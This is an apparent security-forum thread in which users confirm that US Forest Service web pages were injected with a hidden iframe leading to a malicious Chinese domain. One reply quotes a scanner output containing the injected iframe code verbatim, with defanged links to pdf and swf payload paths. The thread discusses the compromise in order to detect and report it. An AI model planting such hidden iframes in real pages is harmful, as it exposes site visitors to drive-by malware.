Iframe-inf infects the United States Forest Service???

[cowboythecat]

Hi, I have been getting a warning that the USFS websites (all of them) are infected with Iframe-inf.

A few have gone down and now have the "experiencing technical difficulties" generic message, which leads me to believe that it may be a real threat.

But linkscanner says they are safe.

Help???

Thanks.

[Tech]

Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?

[cowboythecat]

Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?

I'm sorry, but I don't understand what you mean...  Please use "internet for dummies" terminology when asking me stuff...

I am not aware of a known hack of the USFS.

[DavidR]

Got a link ?
Change the http to hXXP in the URL to ensure it isn't active avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack iframe injection is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out hXXp://www.fs.fed.us/ and it has most certainly been hacked, a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited) now that could be part of the deception or them trying to clear up. But even the attempt to block, e.g. the unavailability page is infected.

[cowboythecat]

Got a link ?
Change the http to hXXP in the URL to ensure it isn't active avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack iframe injection is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out hXXp://www.fs.fed.us/ and it has most certainly been hacked, a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited) now that could be part of the deception or them trying to clear up. But even the attempt to block, e.g. the unavailability page is infected.

I think the link you searched is as good as any...

I have checked multiple FS sites now and gotten the "website currently unavailable" page without a warning from avast... Does this mean I should be concerned that my computer is infected?

Running the most current version of the free program, and using the most current firefox browser.

Thanks for your replies.  Better let my coworkers who run other less-thorough antivirus programs I suppose.

[cowboythecat]

Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.

[DavidR]

Those page that you are getting the message without an avast alert, I can only assume have been cleaned but the site I guess won't be available until they resolve not only the removal of the injected iframes but how they got there and to close that vulnerability.

So without URLs for those you can view without alert there is no way to confirm that they have in fact been cleaned. Though there is more than enough evidence that they have been hacked. If as you say this spreads over multiple sites, though I only see links for the one fs.fed.us domain it could be an orchestrated attack.

Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.

Your viewing of the source is different to mine as this too has most certainly been hacked (see image), with the same injection of a hidden iframe pointing to a Chinese domain...

So I don't see how you are able to see the page with the unavailable message, though that would also depend on your browser (?)

[polonus]

Hi DavidR:

Here the results of the Bad Stuff Detektor:
Total zeroiframes found: 1

Check took 6.95 seconds

(Level: 0) Url checked:
hxxp://www.fs.fed.us/
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/in.cgi?income56
Zeroiframes detected on this site: 0
No ad codes identified

Code:

<iframe src="hxxp://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>

(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/readme.pdf
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/flash.swf
Blank page / could not connect
No ad codes identified


polonus

[scythe944]

I am not aware of a known hack of the USFS.

We found one on the US International Trade Commission site...
http://forum.avast.com/index.php?topic=43712

I think they were down for a little over a week after I notified them.

US government sites seem to be getting hit hard these days.

[CharleyO]

***

The website at ... www.fs.fed.us/r9/shawnee/ ... is currently down apparently to repair the infection.

See the image below. Click to enlarge.


***